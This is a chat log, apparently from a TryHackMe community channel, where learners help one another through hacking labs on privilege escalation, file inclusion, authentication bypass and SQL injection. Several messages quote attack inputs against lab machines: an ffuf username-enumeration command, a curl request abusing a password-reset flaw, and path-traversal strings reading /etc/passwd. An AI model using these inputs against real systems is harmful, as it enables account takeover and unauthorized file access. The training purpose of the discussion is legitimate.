Hey guys, I'm working on the NFS section of the Linux PrivEsc section. I have the exploit created and I've mounted the share but running ./exploit does not give me root. Any ideas?
the exploit is in my own /tmp/attack directory and I am in the /tmp directory on Karen's system
do both exploit.c and the compiled exploit both need to be created by root?
I changed the permissions to include suid permissions
FYI - I changed the placement of the -u to be before the -H flag and this worked.
Oh, do I need to change the permissions on Karen's machine as well?
Yeah, just realized. So should I be the owner or should root be the owner?
Got it. I guess it didn't add the +s correctly on my side. Thanks as always for your excellent help @steel nymph
Gave +1 Rep to @steel nymph
There is a space between - and H. Remove that.
I don't think that is related. Remove that space between - and H and try again.
Thank you - I removed the space and same error message appeared to declare -u flag
Gave +1 Rep to @wispy nimbus
Hello, i'm stuck on File Inclusion -> Challenge -> Task2
So far i got to this point:
File Content Preview of admin
Welcome admin
This is a admin web page! Get the flag!
I really don't know what to do, i spent 1h looking at that and playing with the cookie...
Hahaha, good one, got it
Omg i'm stupid
This is your command after the space got removed:
ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.170.82:80/customers/signup -mr "username already exists" -o valid_username.txt
You should not get an error about the -u flag.
Now, you are still not going to get any results because your -d flag is not complete.
Not sure where I'm going wrong for Lab1 but I keep getting the path wrong.
||/lab1.php?file=/etc/passwd||
Tryhackme doesn't think so lol
Still on the same question. LFI inclusion last task.
When I enter the path it tells me "Uh Oh! undefined"
Stumped 2 days
I'm 100% using bitdefender and as you said, I noticed every time I enter the answer I get a bitdefender notice that someone is trying to access my files.
Thank you for that!
Gave +1 Rep to @steel nymph
I'm on flag 1
What?
I'm fresh fresh
Any sites with correct syntax? That's my problem.
Yes
Send post request with file parameter
I know something with post -x
I tried in burp
Don't know how to do it in browser
how did you try in burp? what steps did you take?
thank you
Gave +1 Rep to @wispy nimbus
Proxy, send to repeater. Changed get to post with ?file=../../../../etc/flag1
name1=value1&name2=value2.... will this come up after send? Do I type this and are the values the same, and if not where do I get that info?
Ok
I'll get it eventually..lol
if you go to the network tab of dev tools. you can export the request as a curl and import it into postman. then you can fool with it. and continue to be stuck (that's where I am atm).
Lol
How did you get that?
File=hello world.. any rooms on THM that goes over this?
I just want to make sure I'm on the right track on LFI lab2. For entering the file name ||../../../../etc/passwd|| or did I miss the mark on what I'm supposed to be looking for.
Yes
Yea, after I entered that from above it gave me the file contents to preview. I thought the answer was somewhere in there.
I feel so stupid after reading that lol. Thank you
Gave +1 Rep to @steel nymph
One of those instances of looking for a puzzle that wasn't there.
Wowwwwww. That easy. It was slapping me in the face the whole time
What tool can I use to automate the requests in Time based SQL room?
I found the columns as || username, password, id|| and was able to know ||username = admin|| from the ||table_name=users||
Finding the value in ||password|| column is tiring me out
||I tried all the 52 alphabets but the password doesn't start with those apparently.||
You can simply input some random string in the input tag and see the url, there should be that file=helloworld
f.e if you search the word random on Google you'll see in the url q=random
Perhaps somebody experienced the same... Burp Intruder, Task 12 CSRF Token Bypass. After creating Macro according to the guide I am still getting static session cookie and loginToken (as per intercepted original). Can't get my head around what is wrong, checked multiple times and all seems as per guide
just a question about SQL, if there's '%' it will register as any string, right?
after some research, the answer is yes
Ok got around that. It appeared that the issue was related to 'URL Scope'. It should be set either to Target Scope globally, or 'Include all URLs' selected
Yes. The % is a wildcard in SQL
How to get a 500 Internal Server Error in the Burp Repeater task?
I'm pretty sure I maxed out the URL parameter i.e. /products/<param>
I put it as || '9' * 4096|| which is the maximum. One more digit and it'll return a ||414 URI too long|| error.
Any help?
Wait, Nvm, I'm just little dumb
nmap -sV scan and it gives back service mysql? version empty, what is another way of knowing what kind of database is running?
Try nmap --script=mysql-info [IP]
thank you it worked!
guys
anyone having problems with the sc query windefend command in powershell? It doesn't print anything
Try in cmd
that worked. ty
Gave +1 Rep to @shadow echo
I am doing File Inclusion Lab #Challenge 3, I am stumped, spent over a day, it's locked down well with regex, looked around the internet, looked up about $_REQUEST, Can't find any reference in the code anywhere to $_REQUEST, no luck, tried all the tricks I know and plenty I didn't. Any ideas why it's not giving up the goods? 10.10.x.x/challenges/chall3.php&file=xxx
Time to become the postman
can anyone help me with the logic flow in authentication bypass lab? for some reason i can't get the flag from robert's support ticket
i did follow all the steps
sure, i'm starting the machine up right now
thanks
if you've followed the steps correctly, you should be able to get a ticket on your account containing a link to login as Robert
did you get that ticket?
remember to use the email address given to your account in the website
that particular email address must be used, otherwise you wouldn't be able to receive the ticket
would you mind showing the curl request command you've used?
sure
curl 'http://10.10.144.63/customers/reset?email=robert@acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&email=robert@customer.acmeitsupport.thm'
remember to use the email address given to your account in the website
when you send a valid request for resetting an account's password, the website would send a ticket to the email address of an account, which contains the link for logging into the account with the reset password
the problem with this is that you could control which email address the website sends the ticket to
as the attacker, you'd want the website to send it to the email address of your account so that you could log into another person's account
there's a particular part of your curl request that you need to change so that the website sends the ticket to your account's email address
so basically you have to create an account with a legit email then use that email in the curl request
the email address you need to use is given to you in the website, under your account settings
once you've created a new account and logged in, check its settings, and you should see an email address there
that's the one you need to use for performing the attack
i logged in using steve's credentials that i got when doing the brute force attack and in the account settings there is an email
can i use that one?
that should work i think
ok let me try
the email address to use is the one in 'Support Tickets', not the one in 'Your Account'
it could be a little confusing haha
i can confirm this method works
:)
let's connect on linkedin
i don't have a linkedin account lol
all good!
maybe i could see yours? lol
agh, i have to create an account now because LinkedIn wouldn't let me view your profile
well feel free to connect anytime
sure!
do you have any cert? CEH, Comptia Pentest+?
not yet, but i'm working to get my eJPT by the coming weekend
cool! that's a good one
i've started studying for it
but i'll prep for the CEH and Pentest+ first as they are more recognized in the industry
once i'm done with the eJPT, i think my next target would be CCNA R&S, CCSK or eNDP
cool well good luck
hi @astral marlin
could you help list down your step for get that flag?
i did follow your discussion, but have not yet got that flag.
which part of the task are you stuck on?
u will pass ejpt easily :)
the logic flow in authentication bypass lab? i cant get the flag from robert's support ticket
did you get a ticket containing a link to access Robert's account after you've reset his password?
yeah the CCNA seems to have a pretty good reputation among employers
it's definitely something on my bucket list
ejpt u will pass no doubts in dat
just do some quick labs on thm like junior pentesting and all
ur good to go
after the reset I only see the status alert "we'll send you a reset email to robert@acmeitsupport.thm" and don't get any link
@shy wasp you need to use the support ticket email address of an account you've created or an account you've compromised on that website
I assume this is a reference to POST? which I gave a fairly good flogging of but it returned nothing. I have a double issue that the VPN persistently goes down to try-hack-me lasting maybe a minute and it must be restarted at every attempt practically.
we want to exploit the logic flaw in the website so that it ends up sending the password reset ticket to an account we can access instead of to Robert's account
maybe try changing the OpenVPN server to connect to or use the AttackBox to send the LFI request?
Joker's hint leads you on the correct track
Linux PrivEsc: Task 5 help? (spoilers, ye be warned) ||I have the http server set up, I have the exploit on my attackbox ready to be wget'd, but every time I try to wget the exploit using karen's account I always get permission denied. I'm sure I am doing something wrong here, any nudges or just flat out answers? It's killing me.||
Noted, I do use the attack box but its a bit more clumsy at times. I could change the VPN server Could its a local server, I had a couple of months of hassle free engagement, then nothing but constant trouble.
which directory are you on in Karen's machine? i have a feeling that's related
I read a few posts about that just now and went all around the directory spamming my wget so far I've gotten no dice
Saying I can't write to the exploit when I try to wget it
@turbid sun
ok thx on tip, rebooting VM its been a while I suspect.
Gave +1 Rep to @turbid sun
this is what i'm suspecting
i've encountered this error before and it's because i was in a directory i couldn't write to
the fix is to cd to a directory you have write permissions for
I'll see if I can sort that out, thanks for the tip @turbid sun I'll be back if I have trouble
Gave +1 Rep to @turbid sun
it worked
yoooo
Now to figure out how to actually run it
I did it
I am root

The days of suffering are over
Hi y'all. I need your help @hard jungle, @primal whale. The machine on "Subdomain Enumeration" is not starting. The ip address is not populating here (http://MACHINE_IP ) How do I resolve this?
Hey @oak shard, I suggest you terminate the machine and deploy a new one. That may help fix the issue.
Let me try
Hi, I have tried that thrice. Nothing has changed. Let me give it another go.
it sounds like a THM bug on the client side
sometimes the IP address doesn't get populated for me as well
perhaps file a report in #site-bugs?
Thank you.
Gave +1 Rep to @turbid sun
Hmm weird timing but
I cannot connect to the Task 6 machine
Task 6 Privilege Escalation: Sudo
Says
Connection Error
The remote desktop server encountered an error and has closed the connection. Please try again or contact your system administrator.
Reconnecting in 5 seconds...
are you connecting to it using remote desktop?
Just through the browser like normal
This is the victim machine not the Attackbox
My Attackbox works fine
the task sounds like it's about a Linux victim machine rather than a Windows one
Strange, it can be pinged but I cannot connect to it through the remote connection meant for it
It's one of those Guacamole boxes
which THM room is this? i might've solved it before
This is the LinuxPrivEsc room still
It seems unrelated to the box, might be buggin
I can connect to it via ssh so no biggie but I was able to do both the Guacamole view and the ssh in Task 5
Tried deploying a new one. Still no success
Please give us some time to pass your request to our team. Thank you
Gave +1 Rep to @oak shard
haven't used Guacamole before but things should be fine if you could SSH into the box
now i got that flag, thank
Gave +1 Rep to @turbid sun
Aiight I have a new problem || Task 7: SUID | So I found the commands that have the s flag owned by root but they're not running as root? What am I missing here?||
||Okay I figured it out but I still don't entirely understand||
as the text from the task has pointed out, 'SUID' stands for 'set-user identification'
it allows a binary to do things as another user
in this case, we want to exploit binaries that do things as the root user so that we could escalate our privileges and access the root account
Right but ||why is it when I use the at command for instance, it doesn't execute the at job as root?||
||since the at command has that flag||
to put it in another way, as a normal user, you could run a program with the SUID bit set, but that program would be able to do things that only a particular user or someone with a particular set of privileges could do, since it sets the user ID during runtime
so, in the program, if it has the SUID bit set and sets the user ID to 0, for example, it'd be doing things as the root user
In the task it states about the SUID bit "These allow files to be executed with the permission level of the file owner " if you check the owner of at, that's not root.
Which is beginner friendly: TryHackMe, Hack The Box or VulnHub... Which can I start with...
Although I've started TryHackMe, just want to know if it's the best to start with
tryhackme feels the most beginner-friendly to me
Ahhhhh I see
Thanks @turbid sun @shadow echo
Gave +1 Rep to @turbid sun
I say try all 3
Just when you get frustrated swap which one you're trying
Wowww at the same time?
I'm doing it right now, got HTB and THM open in two tabs, when one pisses me off I switch tabs
The differences between the two are good for learning as well, keeps what you're reading kinda fluid and changing in style
many of the challenges from HTB feel so much harder than the ones from THM, so i'm currently focused on getting more practice here before attempting more stuff at HTB
I've tried HTB academy. You have to research a lot on your own to succeed.
I was told I'm gonna hack my way into the login in HTB, but I signed up yesterday and it was free and open
I can't really recommend HTB academy, I don't really like the layout and such
That's the redesign
It's way easier to get started now
Ohh
Yeah, definitely give the starting point boxes a shot and don't feel bad if you have to reference the walkthrough at the top of the page
Try not to use it but don't feel bad if you have to peek
The strongest steel is forged in the hottest fires
Gotta challenge yourself to succeed
i haven't done much HTB yet but the starting point boxes serve as a pretty good introduction
can confirm the Guacamole view doesn't work for me for this task as well, but i don't really use much remote desktop to begin with so it's fine
Yeah it hasn't been necessary for me, I just started ssh'ing into it instead of using the viewer
The author of the LinuxPrivEsc room really makes you work for your flag and I love and hate that

can anybody point out any issues with this POST request i have put together - i don't seem to be having much luck on the File Inclusion module...
Two things I can see so far, not sure if the ? at the end of your url will do anything, but definitely the 2 new lines at the end of your parameter.
will try this
if i have already completed this task, it will still give me the Token won't it? i was just going over it to refresh the memory on file inclusion
Sure it will, if you meant the flag
Well, I already saw it
it wasn't giving me an error/token after i got rid of the 2 extra lines